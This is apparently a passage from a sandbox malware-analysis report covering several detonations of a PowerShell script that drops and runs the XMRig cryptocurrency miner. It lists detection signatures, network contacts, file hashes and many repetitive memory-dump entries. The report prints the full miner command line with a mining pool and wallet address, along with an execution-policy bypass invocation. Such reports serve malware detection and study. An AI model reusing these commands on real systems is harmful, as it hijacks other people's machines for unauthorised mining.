memory/3476-107-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-108-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-109-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-110-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-111-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-112-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-113-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-114-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-115-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-116-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-117-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-118-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-119-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-120-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-121-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-122-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-123-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-124-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-125-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-126-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-127-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-128-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-129-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-130-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-131-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-132-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-133-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-134-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-135-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-136-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-137-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-138-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-139-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-140-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-141-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-142-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-143-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-144-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-145-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-146-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-147-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-148-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-149-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-150-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-151-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-152-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-153-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-154-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-155-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-156-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:45

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/5064-4-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp

memory/5064-5-0x00000242EDE50000-0x00000242EDE72000-memory.dmp

memory/5064-8-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/5064-9-0x00000242EE010000-0x00000242EE086000-memory.dmp

memory/5064-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyk3y30p.ejc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5064-26-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/5064-49-0x00000242EE390000-0x00000242EE3A2000-memory.dmp

memory/5064-62-0x00000242EDEE0000-0x00000242EDEEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5076-91-0x0000020F0AEB0000-0x0000020F0AED0000-memory.dmp

memory/5076-92-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-93-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5064-94-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp

memory/5064-95-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp

memory/5076-96-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-97-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-98-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-99-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-100-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-101-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-102-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-103-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-104-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-105-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-106-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-107-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-108-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-109-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-110-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-111-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-112-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-113-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-114-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-115-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-116-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-117-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-118-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-119-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-120-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-121-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-122-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-123-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-124-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-125-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-126-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-127-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-128-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-129-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-130-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-131-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-132-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-133-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-134-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-135-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-136-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-137-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-138-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-139-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-140-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-141-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-142-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-143-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-144-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-145-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-146-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-147-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-148-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-149-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-150-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-151-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-152-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-153-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-154-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-155-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

memory/5076-156-0x00007FF7259E0000-0x00007FF726613000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/4816-0-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/4816-1-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/4816-2-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/4816-9-0x00000176E8040000-0x00000176E8062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zplrp3vc.maw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4816-14-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/4816-15-0x00000176E84A0000-0x00000176E84B2000-memory.dmp

memory/4816-16-0x00000176E8480000-0x00000176E848A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3128-47-0x000002C6AFD40000-0x000002C6AFD60000-memory.dmp

memory/3128-48-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/3128-49-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-50-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/4816-51-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/4816-53-0x00007FF963850000-0x00007FF963BA5000-memory.dmp

memory/3128-52-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-54-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-55-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-56-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-57-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-58-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-59-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-60-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-61-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-62-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-63-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-64-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-65-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-66-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-67-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-68-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-69-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-70-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-71-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-72-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-73-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-74-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-75-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-76-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-77-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-78-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-79-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-80-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-81-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-82-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-83-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-84-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-85-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-86-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-87-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-88-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-89-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-90-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-91-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-92-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-93-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-94-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-95-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-96-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-97-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-98-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-99-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-100-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-101-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-102-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-103-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-104-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-105-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-106-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-107-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-108-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-109-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-110-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-111-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-112-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

memory/3128-113-0x00007FF7A8DC0000-0x00007FF7A99F3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:27

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
